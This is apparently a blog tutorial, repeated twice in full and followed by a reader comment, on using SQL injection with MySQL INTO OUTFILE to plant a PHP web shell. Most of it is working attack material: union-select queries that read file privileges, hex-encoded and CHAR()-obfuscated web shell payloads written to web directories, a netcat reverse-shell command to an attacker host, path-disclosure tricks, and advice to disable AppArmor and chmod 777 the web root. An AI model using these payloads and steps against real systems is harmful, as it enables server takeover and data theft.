SQL Injection With File Upload
SQL Injection With File Upload-
1-chmod -R 777 (for vuln app only, also check AppArmor module)
**************************
Disable and remove AppArmor on Ubuntu based Linux distributions-
AppArmor is security Linux kernel module similar to the SELinux but it's supposed to be easier to setup and maintain. There are many reasons for you to disable it, primary one is that its security features can get in the way of legitimate applications operation. In this article I am going to show you how to disable AppArmor from your Ubuntu based Linux distribution.
1-The thing is actually very simple. First we stop apparmor service using following command:
sudo /etc/init.d/apparmor stop
2-Next thing to do is to disable this service from starting at boot time using Debian update-rc.d tool:
sudo update-rc.d -f apparmor remove
to check with file upload with sqli-
Now, give the neccessary read, write and execute permissions. So, there could be no error while performing operations on these files.
chmod -R 777 /var/www/html/dvwa/
*************************
2- Access to "mysql.user" table and file privileges
?id=-1' union all select 1,2,group_concat(user,0x3a,file_priv) from mysql.user--+
“<?php system($_GET[‘cmd’]); ?>”
0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d
4-run below query-
?id=-1' Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3 INTO OUTFILE '/var/www/shell.php'--+
5-access the below page-
/shell.php?cmd=nc <attacker ip> <port> -e /bin/bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5.Done.
++++++++++++++++++++++++++++++++++++++++++++++++++
More in details-
INTO OUTFILE uploading your shell with MySQL Injection
This is not used a lot, but if you find a target that’s either the root user, or a user granted with root permissions, and they have the privileges we will be able upload a shell with MySQL Injection.
I will explain it step by step.
1. Find out if its root user (we do that by using user() in our vulnerable column).
2. If its root user, we have to check privileges of the user.
3. We have to find the full path of the current user.
4. We have to test if the server has ‘magic quotes’ on or not (IMPORTANT!).
5. Take over time :D.
So let’s explain it some more: First we need to find out if our user is the root we do that with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user—
So in my example I am currently the root user, I’m like ‘yay cool’, but we aren’t there yet my young Padawans!
Now that we know its root, we check their privileges by using the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,user,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20—
If it results in the output:
Root:Y
Then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell, now lets continue and see if we can find the FULL PATH to upload a shell on, (The Full path is important as an user is bound to a certain path with their site)
Sometimes we can get lucky getting the full path, but not all SQL errors will spit it out.
Tip & Tricks to spit out Full Path Disclosure:
1. Use [] before the = sign, this will error out as its not valid.
2. If that doesn’t work, try with either tamper data / livehttpeditor / cookie editor to edit your PHPSESSIONID or COOKIE to 0, then refresh it (As the session / cookie won’t be valid it will yet again error out).
Now that we found full path, we can try and upload a BASIC php shell to execute commands for us, we do that by using INTO OUTFILE. Let me show you a quick example:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,”Hello world”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE /home/mx/public_html/hello.php--
If we are allowed to create a new file in that directory it will now have created hello.php on our www.site.com.
As my full path is: /home/mx/public_html
Common errors:
1. Error code 13 (The directory where you are trying to create a new file in is not writeable (777)).
2. Error code 2 (Wrong path)
Now to upload a shell we use this basic code to upload with:
<?php system($_GET[‘cmd’]); ?>
So our query would look like:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, “<?php system($_GET[‘cmd’]); ?>”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—
If the page returns without error code 13 or 2, or any other error code it should been uploaded.
We can check by going to it and entered ?cmd=ls –la like the following:
www.site.com/shell.php?cmd=ls –la
This should show us the current directory and files within.
But there wasn’t an error and my shell is still not there?
Well then in that case we would have to use Acunetix, to do a SIMPLE folder scan, and we change our paths to whatever folder shows up, imagine they have a /images folder, then we just add /images to our path.
Magic quote’s is on and I can’t upload my shell?!
No worries we can bypass that using CHAR(), some sites with ‘magic quotes’ on will filter out <? Or ?> sign’s when uploading a shell, only CHAR will work, by either using HACKBAR to put <? And ?> into CHAR(60,63) AND CHAR(63,62)
This will result in the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, CHAR(60,63) “system($_GET[‘cmd’]); “ CHAR(63,62),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—
from-http://0haxor.blogspot.com/2012/08/into-outfile-uploading-your-shell-with.html
1-chmod -R 777 (for vuln app only, also check AppArmor module)
**************************
Disable and remove AppArmor on Ubuntu based Linux distributions-
AppArmor is security Linux kernel module similar to the SELinux but it's supposed to be easier to setup and maintain. There are many reasons for you to disable it, primary one is that its security features can get in the way of legitimate applications operation. In this article I am going to show you how to disable AppArmor from your Ubuntu based Linux distribution.
1-The thing is actually very simple. First we stop apparmor service using following command:
sudo /etc/init.d/apparmor stop
2-Next thing to do is to disable this service from starting at boot time using Debian update-rc.d tool:
sudo update-rc.d -f apparmor remove
to check with file upload with sqli-
Now, give the neccessary read, write and execute permissions. So, there could be no error while performing operations on these files.
chmod -R 777 /var/www/html/dvwa/
*************************
2- Access to "mysql.user" table and file privileges
?id=-1' union all select 1,2,group_concat(user,0x3a,file_priv) from mysql.user--+
Your Password:debian-sys-maint:Y,root:Y,guest:Y
ex- If it results in the output:
Root:Y
Then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell, Next find the path to upload shell.
3-convert below string to hex.Root:Y
Then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell, Next find the path to upload shell.
“<?php system($_GET[‘cmd’]); ?>”
0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d
4-run below query-
?id=-1' Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3 INTO OUTFILE '/var/www/shell.php'--+
5-access the below page-
/shell.php?cmd=nc <attacker ip> <port> -e /bin/bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5.Done.
++++++++++++++++++++++++++++++++++++++++++++++++++
More in details-
INTO OUTFILE uploading your shell with MySQL Injection
This is not used a lot, but if you find a target that’s either the root user, or a user granted with root permissions, and they have the privileges we will be able upload a shell with MySQL Injection.
I will explain it step by step.
1. Find out if its root user (we do that by using user() in our vulnerable column).
2. If its root user, we have to check privileges of the user.
3. We have to find the full path of the current user.
4. We have to test if the server has ‘magic quotes’ on or not (IMPORTANT!).
5. Take over time :D.
So let’s explain it some more: First we need to find out if our user is the root we do that with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user—
So in my example I am currently the root user, I’m like ‘yay cool’, but we aren’t there yet my young Padawans!
Now that we know its root, we check their privileges by using the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,user,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20—
If it results in the output:
Root:Y
Then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell, now lets continue and see if we can find the FULL PATH to upload a shell on, (The Full path is important as an user is bound to a certain path with their site)
Sometimes we can get lucky getting the full path, but not all SQL errors will spit it out.
Tip & Tricks to spit out Full Path Disclosure:
1. Use [] before the = sign, this will error out as its not valid.
2. If that doesn’t work, try with either tamper data / livehttpeditor / cookie editor to edit your PHPSESSIONID or COOKIE to 0, then refresh it (As the session / cookie won’t be valid it will yet again error out).
Now that we found full path, we can try and upload a BASIC php shell to execute commands for us, we do that by using INTO OUTFILE. Let me show you a quick example:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,”Hello world”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE /home/mx/public_html/hello.php--
If we are allowed to create a new file in that directory it will now have created hello.php on our www.site.com.
As my full path is: /home/mx/public_html
Common errors:
1. Error code 13 (The directory where you are trying to create a new file in is not writeable (777)).
2. Error code 2 (Wrong path)
Now to upload a shell we use this basic code to upload with:
<?php system($_GET[‘cmd’]); ?>
So our query would look like:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, “<?php system($_GET[‘cmd’]); ?>”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—
If the page returns without error code 13 or 2, or any other error code it should been uploaded.
We can check by going to it and entered ?cmd=ls –la like the following:
www.site.com/shell.php?cmd=ls –la
This should show us the current directory and files within.
But there wasn’t an error and my shell is still not there?
Well then in that case we would have to use Acunetix, to do a SIMPLE folder scan, and we change our paths to whatever folder shows up, imagine they have a /images folder, then we just add /images to our path.
Magic quote’s is on and I can’t upload my shell?!
No worries we can bypass that using CHAR(), some sites with ‘magic quotes’ on will filter out <? Or ?> sign’s when uploading a shell, only CHAR will work, by either using HACKBAR to put <? And ?> into CHAR(60,63) AND CHAR(63,62)
This will result in the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, CHAR(60,63) “system($_GET[‘cmd’]); “ CHAR(63,62),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—
from-http://0haxor.blogspot.com/2012/08/into-outfile-uploading-your-shell-with.html
Really cool stuff. Lately i have tried this trick. Unfortunately, writing the file was unsuccessful. I did some research, i found if i run @@global.secure_file_priv, i get ===> /var/lib/mysql-files/ which means its the only directory mysql can write. And i can only open file in public/. If anyone has an idea please reply.
ReplyDelete